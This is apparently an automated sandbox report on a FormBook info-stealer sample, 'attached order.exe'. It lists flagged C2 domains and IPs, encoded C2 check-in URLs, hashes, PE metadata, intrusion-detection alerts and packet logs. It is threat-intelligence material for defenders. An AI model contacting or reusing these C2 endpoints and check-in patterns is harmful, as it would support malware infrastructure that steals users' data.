                                                                      http://iglpg.online/rbqc/?wIXhAG=3OhzIPQDpE/WyOq4c50vyvr5MYwPqIJwFHC8VhGgYWlBNCQMRbA04kkXhcibOdGaaYQRAVCpl64.exe, 00000004.00000002.17803569863.00000000065DC000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000005.00000002.17795784245.000000000406C000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      https://ac.ecosia.org/autocomplete?q=cacls.exe, 00000005.00000003.17061545869.0000000007B22000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://www.google.com/images/branding/product/ico/googleg_alldp.icocacls.exe, 00000005.00000003.17061545869.0000000007B22000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://tempuri.org/_prof_basesDataSet1.xsdattached order.exe, 00000000.00000002.16557711789.00000000033D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://codepen.io/uzcho_/pens/popular/?grid_type=listRAVCpl64.exe, 00000004.00000002.17803569863.000000000644A000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000005.00000002.17795784245.0000000003EDA000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                              		high
                                                                              https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=cacls.exe, 00000005.00000003.17065504826.0000000007B91000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 00000005.00000003.17061545869.0000000007B22000.00000004.00000020.00020000.00000000.sdmp, t577G2K6.5.drfalse
                                                                                		high
                                                                                https://codepen.io/uzcho_/pen/eYdmdXw.cssRAVCpl64.exe, 00000004.00000002.17803569863.000000000644A000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000005.00000002.17795784245.0000000003EDA000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://vimeo.com/api/v2/group/attached order.exe, 00000000.00000002.16557711789.00000000033D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=cacls.exe, 00000005.00000003.17061545869.0000000007B22000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://gemini.google.com/app?q=cacls.exe, 00000005.00000003.17061545869.0000000007B22000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		high

                                                                                        World Map of Contacted IPs

                                                                                        • No. of IPs < 25%
                                                                                        • 25% < No. of IPs < 50%
                                                                                        • 50% < No. of IPs < 75%
                                                                                        • 75% < No. of IPs

                                                                                        Public IPs

                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                        43.163.1.110
                                                                                        		1hong.pels5zqo.shopJapan4249LILLY-ASUStrue
                                                                                        13.248.169.48
                                                                                        		www.aktmarket.xyzUnited States
                                                                                        		16509AMAZON-02UStrue
                                                                                        173.201.189.241
                                                                                        		iglpg.onlineUnited States
                                                                                        		26496AS-26496-GO-DADDY-COM-LLCUStrue
                                                                                        84.32.84.32
                                                                                        		techmiseajour.netLithuania
                                                                                        		33922NTT-LT-ASLTtrue
                                                                                        66.29.149.46
                                                                                        		www.golivenow.liveUnited States
                                                                                        		19538ADVANTAGECOMUStrue
                                                                                        74.208.236.156
                                                                                        		www.christinascuties.netUnited States
                                                                                        		8560ONEANDONE-ASBrauerstrasse48DEtrue

                                                                                        General Information

                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                        Analysis ID:1563709
                                                                                        Start date and time:2024-11-27 11:26:01 +01:00
                                                                                        Joe Sandbox product:CloudBasic
                                                                                        Overall analysis duration:0h 10m 37s
                                                                                        Hypervisor based Inspection enabled:false
                                                                                        Report type:full
                                                                                        Cookbook file name:default.jbs
                                                                                        Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                                                                        Run name:Potential for more IOCs and behavior
                                                                                        Number of analysed new started processes analysed:6
                                                                                        Number of new started drivers analysed:0
                                                                                        Number of existing processes analysed:0
                                                                                        Number of existing drivers analysed:0
                                                                                        Number of injected processes analysed:1
                                                                                        Technologies:
                                                                                        • HCA enabled
                                                                                        • EGA enabled
                                                                                        • AMSI enabled
                                                                                        Analysis Mode:default
                                                                                        Sample name:attached order.exe
                                                                                        Detection:MAL
                                                                                        Classification:mal100.troj.spyw.evad.winEXE@9/2@8/6
                                                                                        EGA Information:
                                                                                        • Successful, ratio: 100%
                                                                                        HCA Information:
                                                                                        • Successful, ratio: 97%
                                                                                        • Number of executed functions: 211
                                                                                        • Number of non-executed functions: 287
                                                                                        Cookbook Comments:
                                                                                        • Found application associated with file extension: .exe

                                                                                        Warnings

                                                                                        • Exclude process from analysis (whitelisted): dllhost.exe
                                                                                        • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
                                                                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                        • VT rate limit hit for: attached order.exe

                                                                                        Simulations

                                                                                        Behavior and APIs

                                                                                        TimeTypeDescription
                                                                                        05:28:08API Interceptor1x Sleep call for process: attached order.exe modified
                                                                                        05:29:19API Interceptor3330433x Sleep call for process: cacls.exe modified

                                                                                        Joe Sandbox View / Context

                                                                                        IPs

                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        43.163.1.110DOC_114542366.vbeGet hashmaliciousFormBookBrowse
                                                                                        • www.1qcczjvh2.autos/od8t/?KV=TWQhTiU1OhnYN4IGzL5Djgm2xLK+GsutbeycMWjZ529bH9hAjZgdb5GthJXWZD00/RQs8ByXB8t8HO5uPdBuEty+FSeypv/0YqJ9KzFrGa8mXVJ9lffIJok=&Wno=a0qDq
                                                                                        13.248.169.48file.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                        • www.gupiao.bet/t3a1/
                                                                                        DO-COSU6387686280.pdf.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                        • www.krshop.shop/grhe/
                                                                                        Fi#U015f.exeGet hashmaliciousFormBookBrowse
                                                                                        • www.a1shop.shop/5cnx/
                                                                                        ZAMOWIEN.BAT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                        • www.tals.xyz/tj5o/
                                                                                        santi.exeGet hashmaliciousFormBookBrowse
                                                                                        • www.lirio.shop/qp0h/
                                                                                        PAYROLL LIST.exeGet hashmaliciousFormBookBrowse
                                                                                        • www.optimismbank.xyz/98j3/
                                                                                        CV Lic H&S Olivetti Renzo.exeGet hashmaliciousFormBookBrowse
                                                                                        • www.tals.xyz/cpgr/
                                                                                        VSP469620.exeGet hashmaliciousFormBookBrowse
                                                                                        • www.heliopsis.xyz/cclj/?9HaD=8+p9jI+W8p4gGfkrJ06IbG7GVrDrFE39Gbevi7MMoG/mxV0OJ3bBQ6ZfzHGiIebJDzxdJU835govK3Wq3/2OXcUb6pzjLf8wiqFw/QHcYMK4syzjiA==&wdv4=1RD4
                                                                                        CV Lic H&S Olivetti Renzo.exeGet hashmaliciousFormBookBrowse
                                                                                        • www.tals.xyz/cpgr/
                                                                                        Mandatory Notice for all December Leave and Vacation application.exeGet hashmaliciousFormBookBrowse
                                                                                        • www.tals.xyz/stx5/
                                                                                        84.32.84.32DO-COSU6387686280.pdf.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                        • www.samundri.online/5kax/
                                                                                        Arrival Notice.exeGet hashmaliciousFormBookBrowse
                                                                                        • www.servehimfoundation.org/hsva/
                                                                                        DHL SHIPPING CONFIRMATION-SAMPLES DELIVERY ADDRESS.exeGet hashmaliciousFormBookBrowse
                                                                                        • www.alamboost.store/hugc/
                                                                                        Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousFormBookBrowse
                                                                                        • www.pg874.shop/h7d8/?mRu=6+VCk9pNPTQZYCZ6d4PN3EmbuLb87q5olpsVnOemsYlmrkAHkUX/D7H9eR5xtWpIZUSGBjAAXrZ9ZbWt4k2m/mELc90NwjhxnhDwTkUjNTY6s8tAYo2upp8=&UJ=7H1XM
                                                                                        fHkdf4WB7zhMcqP.exeGet hashmaliciousFormBookBrowse
                                                                                        • www.electronify.shop/0s9c/
                                                                                        xBzBOQwywT.exeGet hashmaliciousFormBookBrowse
                                                                                        • www.es-lidl.online/n2dv/
                                                                                        Y7isAhMKal.exeGet hashmaliciousFormBookBrowse
                                                                                        • www.xpremio.online/fopu/
                                                                                        proforma Invoice.exeGet hashmaliciousFormBookBrowse
                                                                                        • www.suerteconysa.online/2k8c/
                                                                                        Wc7HGBGZfE.exeGet hashmaliciousFormBookBrowse
                                                                                        • www.staffmasters.online/up1v/
                                                                                        icRicpJWczmiOf8.exeGet hashmaliciousFormBookBrowse
                                                                                        • www.electronify.shop/0s9c/

                                                                                        Domains

                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        www.aktmarket.xyzFi#U015f.exeGet hashmaliciousFormBookBrowse
                                                                                        • 13.248.169.48
                                                                                        VSP469620.exeGet hashmaliciousFormBookBrowse
                                                                                        • 13.248.169.48
                                                                                        1hong.pels5zqo.shopDOC_114542366.vbeGet hashmaliciousFormBookBrowse
                                                                                        • 43.163.1.110
                                                                                        www.golivenow.liveZAMOWIEN.BAT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                        • 66.29.149.46
                                                                                        www.christinascuties.netfile.exeGet hashmaliciousFormBookBrowse
                                                                                        • 74.208.236.156

                                                                                        ASNs

                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        AS-26496-GO-DADDY-COM-LLCUSarm7.elfGet hashmaliciousMiraiBrowse
                                                                                        • 166.62.63.150
                                                                                        https://clickproxy.retailrocket.net/?url=https%3A%2F%2Fpaydcosx.z13.web.core.windows.netGet hashmaliciousUnknownBrowse
                                                                                        • 208.109.188.185
                                                                                        Order Catalog.vbsGet hashmaliciousGuLoaderBrowse
                                                                                        • 148.72.211.211
                                                                                        https://temp.farenheit.net/XMDNvVFp0d0NmOUNSbFJTSVB2QTRuZktxeWdPaG5ReWxrK1NleVgvbGgvakhBRU5TWkZPQW14RDZLMTlST0pJK3Jja1R0bjkyZkxubHc1UXhLdmU5UVNJcVIyU25JdFVIV0hEc3l3R0kvb3VpWWFlWGxvWmJMSDIwaWRkYTV3c2V3ZnpXcVArUkJXbEpTeWU1SCtuRWNpRVI2RFFuNXh1ODEyQUx3WlNCdDB1N3NjcDh2M1p4MU9qSkJ0R2VDV0VDeVJ4THU5bDM5SkkvaGMxc1hEc3pOb0VtcWl0cDUxemRyc1BwMkE9PS0tRklOcExLZUVZVVZGemhWRC0teTZKNGN1UnI2dUIxL3E5Zm91Q2hVZz09?cid=2268024206Get hashmaliciousKnowBe4Browse
                                                                                        • 148.66.138.157
                                                                                        hkQx7f6zzw.exeGet hashmaliciousTVratBrowse
                                                                                        • 107.180.13.125
                                                                                        botx.spc.elfGet hashmaliciousMiraiBrowse
                                                                                        • 148.72.238.91
                                                                                        63#U2467.htaGet hashmaliciousUnknownBrowse
                                                                                        • 208.109.234.161
                                                                                        https://go.skimresources.com/?id=129857X1600501&url=https%3A%2F%2Fys-law-firm.jimdosite.comGet hashmaliciousHTMLPhisherBrowse
                                                                                        • 107.180.47.58
                                                                                        nuklear.arm.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                        • 148.72.252.155
                                                                                        NOAH $$$$.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                        • 166.62.28.135
                                                                                        LILLY-ASUSsparc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                        • 40.28.90.96
                                                                                        mips.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                        • 43.104.167.70
                                                                                        x86_32.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                        • 43.104.142.7
                                                                                        x86_64.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                        • 43.107.94.20
                                                                                        arm.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                        • 43.41.36.27
                                                                                        powerpc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                        • 43.207.223.208
                                                                                        x86_32.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                        • 40.212.106.210
                                                                                        ppc.elfGet hashmaliciousMiraiBrowse
                                                                                        • 40.162.97.171
                                                                                        sh4.elfGet hashmaliciousMiraiBrowse
                                                                                        • 40.158.40.11
                                                                                        arm5.elfGet hashmaliciousMiraiBrowse
                                                                                        • 43.203.160.115
                                                                                        AMAZON-02USfile.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                        • 108.139.47.33
                                                                                        mipsel.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                        • 18.137.191.113
                                                                                        eInvoice.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                        • 13.227.8.72
                                                                                        sparc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                        • 18.190.189.46
                                                                                        sh4.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                        • 3.115.252.145
                                                                                        arm7.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                        • 18.185.133.128
                                                                                        arm5.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                        • 13.229.98.210
                                                                                        powerpc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                        • 3.156.3.97
                                                                                        mips.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                        • 3.67.122.17
                                                                                        https://hmrc.imicampaign.uk/seeemailinfull/EmailServlet?campaignkw=notrack&tid=cc-0_1732616321656385551&signature=B8C7164A14962A622D435A3DBF774C01Get hashmaliciousUnknownBrowse
                                                                                        • 44.227.124.15

                                                                                        JA3 Fingerprints

                                                                                        No context

                                                                                        Dropped Files

                                                                                        No context

                                                                                        Created / dropped Files

                                                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\attached order.exe.log

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\attached order.exe
                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):1730
                                                                                        Entropy (8bit):5.351477327467947
                                                                                        Encrypted:false
                                                                                        SSDEEP:48:MIHK5HK1Bs1qHiYHKh6oPtHoAhAHKzhHxvKHKOGHKnHKuIN:Pq5q12wCYqh6oPtIAeqzhRCqOGqnquIN
                                                                                        MD5:1CE5835BF97CB675CAFC53DA09933212
                                                                                        SHA1:0C6E3F4EDCE2135689BD0A24B24E7147C3BA8C46
                                                                                        SHA-256:70A42D49E0BC6FF6E7F6F554E4759A49278C8DEF3A9D9A01F3452191D498A34D
                                                                                        SHA-512:0F30531AA7340571641BCB79E9B0DC3D14CA5FDD0D0CFF808F2B66C6C6EF49511D49247495A6F8005192FC4617AAA5E1E0D4DB8354434753A8C09B9DB144C5E7
                                                                                        Malicious:true
                                                                                        Reputation:low
                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\827465c25133ff582ff7ddaf85635407\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\374ae62ebbde44ef97c7e898f1fdb21b\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\b863adc9d550931e279ac7e2ee517d1f\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\10879c5bddb2dd2399e2098d

                                                                                        C:\Users\user\AppData\Local\Temp\t577G2K6

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\cacls.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3036000, page size 2048, file counter 7, database pages 59, cookie 0x52, schema 4, UTF-8, version-valid-for 7
                                                                                        Category:dropped
                                                                                        Size (bytes):135168
                                                                                        Entropy (8bit):1.1142956103012707
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:8t4nKTjebGA7j9p/XH9eQ3KvphCNKRmquPWTPVusE6kvjd:8t4n/9p/39J6hwNKRmqu+7VusEtrd
                                                                                        MD5:E3F9717F45BF5FFD0A761794A10A5BB5
                                                                                        SHA1:EBD823E350F725F29A7DE7971CD35D8C9A5616CC
                                                                                        SHA-256:D79535761C01E8372CCEB75F382E912990929624EEA5D7093A5A566BAE069C70
                                                                                        SHA-512:F12D2C7B70E898ABEFA35FEBBDC28D264FCA071D66106AC83F8FC58F40578387858F364C838E69FE8FC66645190E1CB2B4B63791DDF77955A1C376424611A85D
                                                                                        Malicious:false
                                                                                        Reputation:moderate, very likely benign file
                                                                                        Preview:SQLite format 3......@ .......;...........R......................................................S`...........5........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        Static File Info

                                                                                        General

                                                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Entropy (8bit):7.500595227626125
                                                                                        TrID:
                                                                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                        • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                        • DOS Executable Generic (2002/1) 0.01%
                                                                                        File name:attached order.exe
                                                                                        File size:1'044'992 bytes
                                                                                        MD5:0879125fd7b75f462bc11eaebdb28445
                                                                                        SHA1:54f3cbafcdc1162d30db5167f64d4b98d0ce84c4
                                                                                        SHA256:3a4692716a5ddbc570a1d14328c50b7edf677631b2ac1ea9e99a77aa46de0993
                                                                                        SHA512:c7532f95b4b05f09b03be7986d943cab2cab8899c02c03a626ab4f4c57e13f2d99e099801bafdd9c9451ae0290a63cfcf9154a3d72350949aa86e8674a6952a5
                                                                                        SSDEEP:24576:r3chLC53Vo3h2N4hmXTYJmMc0qBTEWuOAR6uP:bcY53O2G8Xnpdub6uP
                                                                                        TLSH:EE258D9C3210B18FC857C9328954ED74E6616CAA930BD303A1E75DAFBD4E69BDE140F2
                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...ZVFg..............0.................. ........@.. .......................@............@................................

                                                                                        File Icon

                                                                                        Icon Hash:53084c444c441845

                                                                                        Static PE Info

                                                                                        General

                                                                                        Entrypoint:0x4ff7be
                                                                                        Entrypoint Section:.text
                                                                                        Digitally signed:false
                                                                                        Imagebase:0x400000
                                                                                        Subsystem:windows gui
                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                        Time Stamp:0x6746565A [Tue Nov 26 23:14:34 2024 UTC]
                                                                                        TLS Callbacks:
                                                                                        CLR (.Net) Version:
                                                                                        OS Version Major:4
                                                                                        OS Version Minor:0
                                                                                        File Version Major:4
                                                                                        File Version Minor:0
                                                                                        Subsystem Version Major:4
                                                                                        Subsystem Version Minor:0
                                                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                        Entrypoint Preview

                                                                                        Instruction
                                                                                        jmp dword ptr [00402000h]
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al

                                                                                        Data Directories

                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0xff7640x57.text
                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x1000000x1520.rsrc
                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x1020000xc.reloc
                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                        Sections

                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                        .text0x20000xfd7c40xfd8002c45d551170cc167813b567573cd2840False0.7872923600838264data7.504742855579335IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                        .rsrc0x1000000x15200x160010e766ba7029f8ad9a6b019483bf2ef6False0.7563920454545454data6.9770890701268575IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                        .reloc0x1020000xc0x20031b20233458858453320c0cb4e10dcf6False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                        Resources

                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                        RT_ICON0x1001300xfbePNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.892803970223325
                                                                                        RT_GROUP_ICON0x1010f00x14data1.05
                                                                                        RT_VERSION0x1011040x22cdata0.49640287769784175
                                                                                        RT_MANIFEST0x1013300x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                                                        Imports

                                                                                        DLLImport
                                                                                        mscoree.dll_CorExeMain

                                                                                        Network Behavior

                                                                                        Suricata IDS Alerts

                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                        2024-11-27T11:28:57.522385+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.204974574.208.236.15680TCP
                                                                                        2024-11-27T11:29:22.565445+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.204974984.32.84.3280TCP
                                                                                        2024-11-27T11:29:36.291018+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.204975313.248.169.4880TCP
                                                                                        2024-11-27T11:29:50.011210+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.204975766.29.149.4680TCP
                                                                                        2024-11-27T11:30:04.014102+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.2049761173.201.189.24180TCP
                                                                                        2024-11-27T11:30:19.723076+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.204976543.163.1.11080TCP
                                                                                        2024-11-27T11:30:34.386330+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.2049769104.21.7.18780TCP
                                                                                        2024-11-27T11:30:49.772725+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.2049773103.230.159.8680TCP

                                                                                        Network Port Distribution

                                                                                        TCP Packets

                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                        Nov 27, 2024 11:28:57.090857983 CET4974580192.168.11.2074.208.236.156
                                                                                        Nov 27, 2024 11:28:57.300616026 CET804974574.208.236.156192.168.11.20
                                                                                        Nov 27, 2024 11:28:57.300940990 CET4974580192.168.11.2074.208.236.156
                                                                                        Nov 27, 2024 11:28:57.303443909 CET4974580192.168.11.2074.208.236.156
                                                                                        Nov 27, 2024 11:28:57.512939930 CET804974574.208.236.156192.168.11.20
                                                                                        Nov 27, 2024 11:28:57.521481037 CET804974574.208.236.156192.168.11.20
                                                                                        Nov 27, 2024 11:28:57.522082090 CET804974574.208.236.156192.168.11.20
                                                                                        Nov 27, 2024 11:28:57.522384882 CET4974580192.168.11.2074.208.236.156
                                                                                        Nov 27, 2024 11:28:57.522965908 CET4974580192.168.11.2074.208.236.156
                                                                                        Nov 27, 2024 11:28:57.732300043 CET804974574.208.236.156192.168.11.20
                                                                                        Nov 27, 2024 11:29:12.910284042 CET4974680192.168.11.2084.32.84.32
                                                                                        Nov 27, 2024 11:29:13.326765060 CET804974684.32.84.32192.168.11.20
                                                                                        Nov 27, 2024 11:29:13.327138901 CET4974680192.168.11.2084.32.84.32
                                                                                        Nov 27, 2024 11:29:13.330559969 CET4974680192.168.11.2084.32.84.32
                                                                                        Nov 27, 2024 11:29:13.747092009 CET804974684.32.84.32192.168.11.20
                                                                                        Nov 27, 2024 11:29:13.747140884 CET804974684.32.84.32192.168.11.20
                                                                                        Nov 27, 2024 11:29:15.852926016 CET4974780192.168.11.2084.32.84.32
                                                                                        Nov 27, 2024 11:29:16.268896103 CET804974784.32.84.32192.168.11.20
                                                                                        Nov 27, 2024 11:29:16.269134045 CET4974780192.168.11.2084.32.84.32
                                                                                        Nov 27, 2024 11:29:16.272559881 CET4974780192.168.11.2084.32.84.32
                                                                                        Nov 27, 2024 11:29:16.688508034 CET804974784.32.84.32192.168.11.20
                                                                                        Nov 27, 2024 11:29:16.688692093 CET804974784.32.84.32192.168.11.20
                                                                                        Nov 27, 2024 11:29:18.789793968 CET4974880192.168.11.2084.32.84.32
